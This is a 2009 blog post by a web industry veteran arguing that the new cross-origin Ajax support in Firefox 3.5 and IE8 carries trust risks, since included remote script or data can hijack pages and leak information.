Cross Origin Ajax Requests Have Landed

by | July 6th, 2009

A year ago I mentioned that cross origin Ajax requests were coming and then got backed out of the last version of Firefox Well they are back now and they do work in Firefox 3.5 IE 8 landed similiar functionality using something called an XDR ( Of course the big question is still, is this a good thing?

Simplicity of communication rules, so I’ll just answer directly.  NO this really isn’t a good thing unless you are quite careful or you make some of your living as a security consultant.

The bottom line with JavaScript based Web services is that if you include remote script in your page it can OWN you.  The very nature of JavaScript is that it can rewrite your objects as it likes.  That is it nature it isn’t a security flaw.  Futher it has quite a few ways of communicating and can leak information out quite easily from history and cookies and maybe more.

In the Ajax book we demonstrated the security concern with JavaScript being mistrusted over and over.  If you haven’t seen a demo here is a parasitic JavaScript binding on to your underlying XMLHttpRequest object that powers everything and watching your data.   If you pull in remote script it can do these kind of things and worse.  This isn’t a tech flaw, this is a trust flaw on your part as a developer.

Given the nature of JavaScript and how it is generally employed you should have extreme trust with any remote source be it linked script, retieved code or even fetched JSON packets.  Unfortunately that just isn’t the situation in most cases.   We talk all about the features in new Firefox but it takes until the very bottom this cold bucket of water is acknowledged.

A Note on Security

In general, data requested from a remote site should be treated as untrusted. Executing JavaScript code retrieved from a third-party site without first determining its validity is NOT recommended. Server administrators should be careful about leaking private data, and should judiciously determine that resources can be called in a cross-site manner.

So read that carefully you should determine validitiy before using script from 3rd-parties, but here is the rub, is that going to stay constant?  If you look once and then just use what’s to say that source doesn’t change or gets owned and then owns you?  Absolutely nothing unless you are monitoring the script for changes with some proxy.  Great idea, almost never done.

Don’t get me wrong.  I like new features and in fact am pro Web service, but the reality is that you are given implicit and significant trust here.  Even with just data pass back people have seen interesting hacks overriding the GETTER/SETTERS for array values.  In short even pure data responses have issues unless they are carefully wrapped.  Mix in the dynamic nature of JavaScript and it is a recipe for disaster.  Trust is the concern and you should not trust implicitly.  Further you should be minding your store lest you get owned by what Web service you link to or script you include.

I am certainly not the only one who sees this and can’t say that this type of alarm ringing is novel.  In fact we have been down this path before.  Flash supports similiar technology using its CrossDomain.xml file and folks like Jeremiah Grossman clearly pointed out that out in the wild quite often it is done wrong and in many cases quite wrong.  Now that Firefox and other browsers are supporting it natively I think we are going to see an explosion in cross-origin calls before there is a retreat as quality and security problems explode.  Though that isn’t all bad, you do usually have to exercise something to shake out the problems, just be careful!


Thomas Powell is a long-time web industry veteran, as well as the founder and CEO of PINT.